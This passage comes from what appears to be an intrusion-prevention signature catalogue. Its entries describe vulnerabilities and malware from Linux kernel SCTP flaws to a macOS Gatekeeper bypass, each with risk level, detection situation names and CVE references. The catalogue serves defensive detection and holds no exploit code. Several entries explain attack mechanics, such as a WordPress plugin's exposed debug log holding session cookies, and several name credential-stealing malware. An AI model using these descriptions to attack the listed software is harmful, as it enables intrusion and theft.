Situation: IPv4_Linux-Kernel-SCTP_Process_UNK_Param-Sctpchunkinit-Buffer-Overflow
References:
CVE-2010-1173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173
BID-39794
http://www.securityfocus.com/bid/39794
Back to top

Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel Organization Linux Kernel
Risk: High
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in Linux kernel.
Situation: IPv4_Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service
IPv6_Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service
References:
CVE-2010-0008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008
BID-38857
http://www.securityfocus.com/bid/38857
Back to top

Linux-Kernel-TIPC-Fragment-Handling-Use-After-Free-CVE-2024-36886

About this vulnerability: A vulnerability in Linux Kernel
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: A use after free vulnerability has been reported in the TIPC module of the Linux Kernel. The vulnerability is due to improper handling of an error case when processing fragmented TIPC messages. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of the vulnerability can result in a denial of service condition or, in the worst case, code execution in the context of the kernel.
Situation: Generic_UDP-Linux-Kernel-TIPC-Fragment-Handling-Use-After-Free-CVE-2024-36886
References:
CVE-2024-36886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36886
Back to top

Linux-Kernel-TIPC-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in the TIPC module of the Linux Kernel.
Risk: High
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: A vulnerability in the TIPC module of the Linux Kernel, versions prior to 5.14.16, which allows remote attackers to execute arbitrary code by sending a crafted request to the vulnerable server, due to insufficient validation of user-supplied sizes for the MSG_CRYPTO message type.
Situation: Generic_UDP-Linux-Kernel-TIPC-Heap-Buffer-Overflow
References:
CVE-2021-43267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43267
Back to top

Linux-Kernel-TIPC-Stack-Buffer-Overflow-CVE-2022-0435

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: High
First detected in: sgpkg-ips-1503-5242
Last changed: sgpkg-ips-1503-5242
Platform: Generic
Software: <os>
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in the TIPC module of the Linux Kernel. The vulnerability is due to insufficient validation of user-supplied sizes for monitoring framework messages. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable server. A successful attack can result in arbitrary code execution with kernel privileges.
Situation: Generic_UDP-Linux-Kernel-TIPC-Stack-Buffer-Overflow-CVE-2022-0435
References:
CVE-2022-0435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0435
Back to top

Linux-Kernel-UDP-UFO-Large-Packet-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: Moderate
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There is a denial of service vulnerability in the Linux Kernel with UDP Fragmentation Offload (UFO) enabled. The vulnerability is due to improper handling of UDP packets over IPv6 with a size larger than MTU when the kernel is configured with the TBF qdisc. A remote attacker can exploit this vulnerability by sending a crafted packet to a vulnerable server. Successful exploitation can result in memory corruption which leads to a denial of service condition.
Situation: TFTP_CS-Linux-Kernel-UDP-UFO-Large-Packet-Denial-Of-Service
References:
CVE-2013-4563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4563
BID-63702
http://www.securityfocus.com/bid/63702
OSVDB-99877
http://www.osvdb.org/99877
Back to top

LinuxKI-Toolset-Remote-Code-Execution

About this vulnerability: A vulnerability in LinuxKI Toolset
Risk: High
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Platform: Linux; Unix
Software: LinuxKI Toolset
Type: Input Validation
Description: There exists a vulnerability in LinuxKI Toolset, versions 6.01 and before, which allows remote attackers to execute arbitrary code, due to insufficient user input validation.
Situation: HTTP_CSU-LinuxKI-Toolset-Remote-Code-Execution
References:
CVE-2020-7209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7209
Back to top

Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Liquid XML Studio software
Risk: Moderate
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Liquid Technologies XML Studio
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Liquid XML Studio LtXmlComHelp8.dll ActiveX control. The vulnerability can be exploited by enticing a target user to open a maliciously crafted HTML document to execute arbitrary code on a target system.
Situation: HTTP_SS-Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow
File-Text_Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow
References:
OSVDB-63087
http://www.osvdb.org/63087
Back to top

Listrec-Pl-Vulnerability

About this vulnerability: Listrec.pl remote code execution and file disclosure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: listrec.pl
Type: Input Validation
Description: The listrec.pl from Textor Webmasters Ltd. contains an input validation flaw that may allow command execution and file disclosure.
References:
CVE-2001-0997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0997
BID-3328
http://www.securityfocus.com/bid/3328
Back to top

LiteSpeed-Cache-Unauthenticated-Account-Takeover-CVE-2024-44000

About this vulnerability: An attempt to exploit a vulnerability in WordPress detected
Risk: High
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Platform: Generic
Software: WordPress
Type: Insecure Configuration
Description: The debug logging feature of the WordPress' LiteSpeed Cache plugin versions before 6.5.0.1 logs all HTTP response headers into a file. The headers include the "Set-Cookie" header, which contains session cookies used to authenticate users. If an attacker can steal them, they can impersonate an admin user and take complete control of the site. The log file is available at "/wp-content/debug.log". Accessing the file is possible when no file access restriction has been implemented.
Situation: HTTP_CSU-LiteSpeed-Cache-Unauthenticated-Account-Takeover-CVE-2024-44000
References:
CVE-2024-44000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44000
Back to top

LiteSpeed-Web-Server-Source-Code-Disclosure

About this vulnerability: A LiteSpeed Web Server Source Code Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LiteSpeed
Type: Configuration Error
Description: A vulnerability in LiteSpeed Web Server, versions 4.0.x before 4.0.15, which allows remote attackers to read source code of scripts via an HTTP request with a null byte followed by a .txt extension.
Situation: HTTP_CSU-LiteSpeed-Web-Server-Source-Code-Disclosure
References:
CVE-2010-2333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333
BID-40815
http://www.securityfocus.com/bid/40815
OSVDB-65476
http://www.osvdb.org/65476
Back to top

Livinston-Telnet-Reboot

About this vulnerability: Livingston Portmaster Reboot DOS
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Other
Software: Generic telnet server
Type: Malfunction
Description: Livingston Portmaster could be remotely rebooted without authorization.
Situation: Telnet_CCS-Livingston-Reboot-DoS
References:
CVE-1999-0218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0218
Back to top

LoadRunner-magentproc.exe-Stack-Buffer-Overflow

About this vulnerability: A LoadRunner magentproc.exe Stack Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP LoadRunner
Type: Buffer Overflow
Description: A buffer overflow vulnerability in HP LoadRunner, versions 11.52 and before, which allows remote attackers to cause a denial of service condition or execute arbitrary code, due to the insufficient validation of a length value in SSL communication with magentproc.exe.
Situation: Generic_CS-LoadRunner-magentproc.exe-Stack-Buffer-Overflow
References:
CVE-2013-4800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4800
Back to top

Local-System-Access-Via-ActiveX-Controls

About this vulnerability: ActiveX controls allow access to the local system
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1779-5242
Platform: Windows
Software: Internet Explorer; Generic HTTP client
Type: Malfunction
Description: Microsoft Windows allows access to local resources via several different ActiveX controls. Normally these controls can be accessed only from programs that have been started from the local machine. By using other vulnerabilities, these controls may be used from code in a web page or email message, allowing arbitrary code execution or local resource access in the context of the currently logged in user.
Situation: HTTP_Scripting.FileSystemObject-ActiveX-Object-Local-File-Write
HTTP_Shell.Application-ActiveX-Object-Local-File-Execute
HTTP_WScript.Shell-ActiveX-Object-Local-File-Execute
HTTP_WScript.Shell-ActiveX-Object-Local-Registry-Access
File-Text_ShellExecute-ActiveX-Object-Batch-Script-Local-Execute
File-Text_WScript.Shell-ActiveX-Object-Local-Registry-Access
File-Text_Scripting.FileSystemObject-ActiveX-Object-Local-File-Write
File-Text_Shell.Application-ActiveX-Object-Local-File-Execute
File-Text_WScript.Shell-ActiveX-Object-Local-File-Execute
File-TextId_WScript.Shell-ActiveX-Object-Local-File-Execute
Back to top

Locky-B-Control-Traffic

About this vulnerability: HTTP traffic related to Locky Ransomware
Risk: High
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Locky is a ransomware spreading botnet.
Situation: HTTP_CSH-Locky-B-Control-Traffic
Back to top

Log4j-Denial-of-Service-CVE-2021-45105

About this vulnerability: An attempt to exploit a vulnerability in Log4j detected
Risk: High
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1420-5242
Platform: Generic
Software: Apache Software Foundation Log4j
Type: Infinite Loop
Description: An uncontrolled recursion vulnerability has been reported in the StrSubstitutor class of Apache Log4j. This vulnerability is due to improper handling of logged messages when the logging configuration uses a non-default Pattern Layout with a Context Map Lookup, Map Lookup, or Structured Data Lookup. A remote attacker who can control an item in the Thread Context Map or a MapMessage or StructuredDataMessage can exploit this vulnerability by sending a specially crafted parameter to the target application. Successful exploitation could result in a denial-of-service condition due to a crash of the Log4j service.
Situation: HTTP_CS-Log4j-Denial-of-Service-CVE-2021-45105
HTTP_CRL-Log4j-Denial-of-Service-CVE-2021-45105
References:
CVE-2021-45105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
Back to top

Log4j-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Log4j detected
Risk: Critical
First detected in: sgpkg-ips-1413-5242
Last changed: sgpkg-ips-1423-5242
Platform: Generic
Software: Apache Software Foundation Log4j
Type: Malfunction
Description: An attempt to exploit a vulnerability in Log4j detected.
Situation: HTTP_CS_Log4j-Remote-Code-Execution
HTTP_CS_Log4j-Remote-Code-Execution-Environment-Variable-Leak
HTTP_CS_Log4j-Remote-Code-Execution-Evasion
HTTP_CRL-Log4j-Remote-Code-Execution
Generic_CS-Log4j-Remote-Code-Execution
File-PDF_Log4j-Remote-Code-Execution
References:
CVE-2021-44228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
Back to top

Logback-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Logback detected
Risk: High
First detected in: sgpkg-ips-1418-5242
Last changed: sgpkg-ips-1418-5242
Platform: Generic
Software: Logback
Type: Malfunction
Description: An attempt to exploit a vulnerability in Logback detected.
Situation: HTTP_CS-Logback-Remote-Code-Execution
Back to top

Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Logitech VideoCall
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Logitech VideoCall
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Logitech VideoCall ActiveX control. The vulnerability is due to an error in a particular method exposed by the ActiveX control that suffers insufficient input validation. Exploitation may lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow
File-Text_Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-2918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2918
BID-24254
http://www.securityfocus.com/bid/24254
OSVDB-36820
http://www.osvdb.org/36820
Back to top

LogPOS-Malware

About this vulnerability: LogPOS Malware
Risk: High
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Code Injection
Description: LogPOS is a malware that steals credit card information and stores them in a mailslot.
Situation: HTTP_CSU-LogPOS-Malware-Traffic-Detected
Back to top

Logsign-Remote-Command-Injection

About this vulnerability: A Logsign Remote Command Injectio vulnerability
Risk: High
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Logsign
Type: Input Validation
Description: A vulnerability in Logsign, versions 4.4.2 and 4.4.137, which allows remote attackers to execute arbitrary code due to the lack of input validation.
Situation: HTTP_CRL-Logsign-Remote-Command-Injection
Back to top

Logsign-Unified-Secops-Authentication-Failure

About this vulnerability: A failed Logsign Unified SecOps authentication attempt detected
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: Logsign Unified SecOps
Type: Brute Force
Description: This detects failed authentication attempts for Logsign Unified SecOps. A large number of such attempts in a short period of time may indicate a 2FA brute force attack.
Situation: File-Text_Logsign-Unified-Secops-Authentication-Failure
References:
CVE-2025-1044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1044
Back to top

Logsign-Unified-Secops-Platform-Missing-Authentication-CVE-2024-5721

About this vulnerability: A vulnerability in Logsign Unified SecOps
Risk: Critical
First detected in: sgpkg-ips-1768-5242
Last changed: sgpkg-ips-1768-5242
Platform: Generic
Software: Logsign
Type: Malfunction
Description: An unauthenticated remote code execution vulnerability has been reported in the Logsign Unified SecOps Platform. The vulnerability is due to the lack of authentication in Logsign's cluster HTTP API. Successful exploitation results in the execution of arbitrary code in the context of root.
Situation: File-Text_Logsign-Unified-Secops-Platform-Missing-Authentication-CVE-2024-5721
References:
CVE-2024-5721
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5721
Back to top

LOIC-DoS-Tool

About this vulnerability: LOIC DoS Tool
Risk: High
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Resource Starvation
Description: Low Orbit Ion Cannon (LOIC) is a tool that can be used for network stress testing and denial of service attacks. Some LOIC versions have a feature that allows it to be remotely controlled via IRC. There are also a JavaScript version (called JS LOIC) and a web version (called Low Orbit Web Cannon) which enable participation in a DoS attack using a web browser. For example Anonyous has used LOIC and JS LOIC in its attacks.
Situation: Analyzer_LOIC-HTTP-Denial-Of-Service
HTTP_CRL-Possible-LOIC-Request
HTTP_CRL-Suspected-LOIC-Request
File-Text_JavaScript-LOIC-Download
Back to top

Loki-Bot-C2-Traffic

About this vulnerability: Loki Bot C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Loki Bot is a credential stealer malware. It's capable to steal passwords from several applications.
Situation: HTTP_CS-Loki-Bot-C2-Traffic
Back to top

Loki-RAT

About this vulnerability: LOKI RAT
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: LOKI is a Remote Administration Tool (RAT) that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: HTTP_CSU-Loki-RAT-Traffic
Back to top

Lolibotinc-Botnet

About this vulnerability: Lolibotinc botnet
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Code Injection
Description: Lolibotinc is a worm that infects Linux-based systems.
Situation: Generic_CS-Lolibotinc-Linux-Infection-Traffic
Back to top

Long-Basic-Authorization-Header

About this vulnerability: A long authorization header with basic scheme
Risk: Low
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Buffer Overflow
Description: An long Authorization HTTP header with Basic scheme was detected. Basic authentication represents a non-encrypted base64-encoded string of username and password, likely indicating the use of lengthy passwords. However, this can also be used for buffer overflow attacks against vulnerable HTTP servers.
Situation: HTTP_CSH-Long-Basic-Authorization-Header
Back to top

Long-Domain-Name-Redirect

About this vulnerability: HTTP redirect to unusually long domain name
Risk: Low
First detected in: sgpkg-ips-795-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Post Compromise Behaviour
Description: Unusually long domain name redirects are sometimes common with legitimate Internet traffic, but often they reveal communication to automatically generated endpoints hosting malware.
Situation: HTTP_SHS-Possibly-Malicious-Long-Domain-Name-Redirect
Back to top

Long-Domain-Name-With-Mixed-Letters-And-Digits

About this vulnerability: A DNS request containing a long domain name with mixed letters and digits detected
Risk: High
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Platform: Generic
Software: Any Software
Type: Backdoor
Description: This fingerprint detects DNS queries that contain long domain names with mixed letters and digits. One or few of such DNS queries may not be a compromise indicator. However, seeing many of them in a short amount of time may be a sign of data being exfiltrated via DNS.
Situation: DNS-UDP_Long-Domain-Name-With-Mixed-Letters-And-Digits
DNS-UDP_Suspicious-Long-Domain-Name-With-Mixed-Letters-And-Digits
Back to top

Loop-Denial-Of-Service-CVE-2024-2169

About this vulnerability: An attempt to exploit a vulnerability in UDP protocol detected
Risk: High
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1709-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: In a loop denial-of-service attack, the attacker creates application-layer loops in which two network services keep responding to each others' messages. For example, imagine two services that respond with an error message when receiving an error message as input. If an error as input creates an error as output, and a second system behaves the same, these two systems will keep sending error messages back and forth indefinitely. Such loop behaviors have been discovered to exist in certain TFTP, DNS and NTP implementations.
Situation: DNS-UDP_DNS-Error-Response-With-Same-Source-And-Destination-Ports
TFTP_CS-TFTP-Error-Response-With-Same-Source-And-Destination-Ports
NTP_UDP-NTP-Response-With-Same-Source-And-Destination-Ports
References:
CVE-2024-2169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2169
Back to top

Lop

About this vulnerability: Lop
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lop
Type: Misconfiguration
Description: Lop is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Lop
Back to top

LordEK-Traffic

About this vulnerability: LordEK traffic was detected
Risk: High
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Lord exploit kit traffic was detected.
Situation: HTTP_CRL-LordEK-Traffic
Back to top

Lotus-Domino-Directory-Traversal

About this vulnerability: Lotus Domino directory traversal
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Directory Traversal
Description: A directory traversal vulnerability allows a remote attacker to read arbitrary files from a Domino server, including files that contain passwords and other sensitive information. Successful exploitation of this vulnerability may provide the attacker enough information to fully compromise the system.
Situation: HTTP_CSU-Lotus-Notes-Directory-Traversal
References:
CVE-2001-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0009
BID-2173
http://www.securityfocus.com/bid/2173
OSVDB-1703
http://www.osvdb.org/1703
Back to top

Lotus-Domino-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in Lotus Domino HTTP server
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Malfunction
Description: Lotus Domino HTTP Server is vulnerable to a Denial of Service (DoS) attack. A remote attacker can make approximately 400 access attempts to DOS devices to cause the server to crash.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2001-0602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0602
BID-2575
http://www.securityfocus.com/bid/2575
BID-4019
http://www.securityfocus.com/bid/4019
BID-4020
http://www.securityfocus.com/bid/4020
OSVDB-10810
http://www.osvdb.org/10810
Back to top

Lotus-Domino-IMAP-Server-Cram-md5-Authentication-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in IBM Lotus Domino
Risk: High
First detected in: sgpkg-ips-102-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the IBM Lotus Domino IMAP service. The vulnerability is due to a boundary error when processing CRAM-MD5 authentication within the IMAP service of IBM Lotus Domino software. Successful exploitation of this vulnerability allows unauthenticated remote attackers to create a denial of service condition or execute arbitrary code on the vulnerable system in the context of the affected application, commonly System.
Situation: IMAP_Authenticate-Command-Buffer-Overflow-2
IMAP_Authenticate-Command-Buffer-Overflow
References:
CVE-2007-1675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1675
BID-23172
http://www.securityfocus.com/bid/23172
Back to top

Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in IBM Lotus Domino
Risk: High
First detected in: sgpkg-ips-291-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Domino
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in multiple ActiveX controls that are part of IBM Lotus Domino. The vulnerability is due to a boundary error when handling malformed data. A remote attacker can exploit the vulnerability by enticing the target user to visit a malicious web page. Successful exploitation causes memory corruption that may lead to arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SS-Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow
File-Text_Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow
Back to top

Lotus-Notes-URI-Handler-Argument-Injection

About this vulnerability: A vulnerability in Lotus Notes
Risk: High
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Notes
Type: Input Validation
Description: There is a vulnerability in the URI scheme handling process in IBM's Lotus Notes client. This vulnerability allows a malicious attacker to entice a victim to load the Lotus Notes client with a crafted configuration file. This configuration file could be retrieved from a remote system using a UNC pathname. It is possible for an attacker to specify code to be loaded and executed by the Lotus Notes client using this configuration file.
Situation: File-Text_Lotus-Notes-URI-Handler-Argument-Injection
References:
CVE-2004-0480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0480
BID-10600
http://www.securityfocus.com/bid/10600
Back to top

LPD-SAPlpd-Multiple-Commands-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerabilities in SAPlpd and SAPSprint
Risk: Moderate
First detected in: sgpkg-ips-267-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: SAPlpd
Type: Buffer Overflow
Description: SAPlpd versions 6.28 and earlier contain multiple buffer overflow vulnerabilities. A successful exploit allows remote attackers to execute arbitrary code on the vulnerable host.
Situation: Printer_CS-SAPlpd-Multiple-Command-Buffer-Overflow
References:
CVE-2008-0621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0621
BID-27613
http://www.securityfocus.com/bid/27613
Back to top

Lpd-Sendmail-System-Compromise

About this vulnerability: System compromise vulnerability in lpd
Risk: Moderate
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: lpd
Type: Malfunction
Description: The line printer daemon (lpd) could be used to specify arguments to sendmail. An attacker could manipulate the control and data files to execute sendmail with a specified configuration file to gain root access on the system.
Situation: Printer_Lpd-Sendmail-System-Compromise
References:
CVE-2000-1220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1220
BID-927
http://www.securityfocus.com/bid/927
Back to top

Lprng-Format-String-Vulnerability

About this vulnerability: Format string vulnerability in lprng
Risk: Moderate
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: lprng
Type: Format String
Description: A malicious user can pass a string that's then passed to syslog as the format string. This can be exploited to gain superuser access on the target host.
Situation: Printer_Lpr-Format-String-Attack
References:
CVE-2000-0917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
BID-1712
http://www.securityfocus.com/bid/1712
Back to top

Lucee-Administrator-imgProcess-Arbitrary-File-Write

About this vulnerability: A vulnerability in Lucee.
Risk: High
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1564-5242
Platform: Unix; Linux
Software: Lucee
Type: Input Validation
Description: A vulnerability in Lucee Admin, versions before 5.3.7.47, 5.3.6.68 and 5.3.5.96, which allows remote attackers to execute arbitrary commands due to the possible arbitrary file write in Lucee Administrator's imgProcess.cfm.
Situation: HTTP_CSU-Lucee-Administrator-imgProcess-Arbitrary-File-Write
References:
CVE-2021-21307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21307
Back to top

Lucee-Authenticated-Scheduled-Job-Code-Execution

About this vulnerability: A vulnerability in Lucee.
Risk: High
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1564-5242
Platform: Unix; Windows
Software: Lucee
Type: Input Validation
Description: A vulnerability in Lucee which allows remote attackers to execute a payload on Lucee servers by creating a scheduled job that queries a remote ColdFusion file, which is then downloaded and executed when accessed.
Situation: HTTP_CRL-Lucee-Authenticated-Scheduled-Job-Code-Execution
Back to top

LuminosityLink-RAT-C2-Traffic

About this vulnerability: LuminosityLink RAT C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: LuminosityLink RAT is a publicly sold remote access trojan. It can be used to view files, record keystrokes and spy webcam on victim's computer.
Situation: Generic_TCP-LuminosityLink-RAT-C2-Traffic
Back to top

Lumma-Stealer-C2-Activity

About this vulnerability: Lumma Stealer command-and-control traffic detected
Risk: High
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Platform: Windows
Software: Lumma Stealer
Type: Backdoor
Description: Lumma Stealer is a type of trojans that targets the Windows platform. The malware collects system information (e.g., computer name, user name) and browser information (e.g., history, cookies). The collected data is sent to the attacker's command-and-control server using HTTPS.
Situation: HTTP_CSU-Lumma-Stealer-C2-Activity
Back to top

Maarch-LetterBox-Unrestricted-File-Upload

About this vulnerability: Maarch LetterBox Unrestricted File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-686-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Maarch LetterBox
Type: Insecure Configuration
Description: An unrestricted file upload vulnerability exists in Maarch-LetterBox 2.8 and earlier, do to the lack of file type verification, which allows remote attackers to execute arbitrary PHP code by uploading a file with a PHP extension and then accessing it via a request to the file name.
Situation: HTTP_CS-Maarch-LetterBox-Unrestricted-File-Upload
References:
CVE-2015-1587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1587
OSVDB-113928
http://www.osvdb.org/113928
Back to top

Maazben-Bot

About this vulnerability: Maazben Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Maazben is a Botnet used for sending spam messages.
Situation: HTTP_CSH-Maazben-Bot-Traffic
Back to top

Mac-OS-X-Dmg-UFS-ffs_mountfs-Integer-Overflow

About this vulnerability: A vulnerability in Mac OS X
Risk: High
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Input Validation
Description: There is an integer overflow vulnerability in Mac OS X, that can be triggered by a malformed disk image (DMG) file.
Situation: File-Binary_Mac-OS-X-Dmg-UFS-ffs_mountfs-Integer-Overflow
References:
CVE-2007-0229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0229
BID-21993
http://www.securityfocus.com/bid/21993
OSVDB-32684
http://www.osvdb.org/32684
Back to top

Macontrol

About this vulnerability: MaControl
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: MaControl is a backdoor for Mac OS X. It may arrive inside a malicious zip-file e-mail attachment. The backdoor allows a remote attacker to list files, transfer files and run commands on the infected machine.
Situation: HTTP_CS-Macontrol-Traffic
Back to top

MacOS-Gatekeeper-Check-Bypass-CVE-2021-30657

About this vulnerability: A vulnerability in macOS Gatekeeper
Risk: High
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Mac OS
Software: <os>
Type: Code Injection
Description: There exists a vulnerability in macOS which may allow shell scripts in specially crafted apps to bypass Gatekeeper checks. This fingerprint detects attempts to exploit the vulnerability via zipped .app files.
Situation: File-Text_MacOS-Gatekeeper-Check-Bypass-CVE-2021-30657
References:
CVE-2021-30657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657
Back to top

Macromedia-Flash-Media-Server-Administration-Service-Denial-of-Service

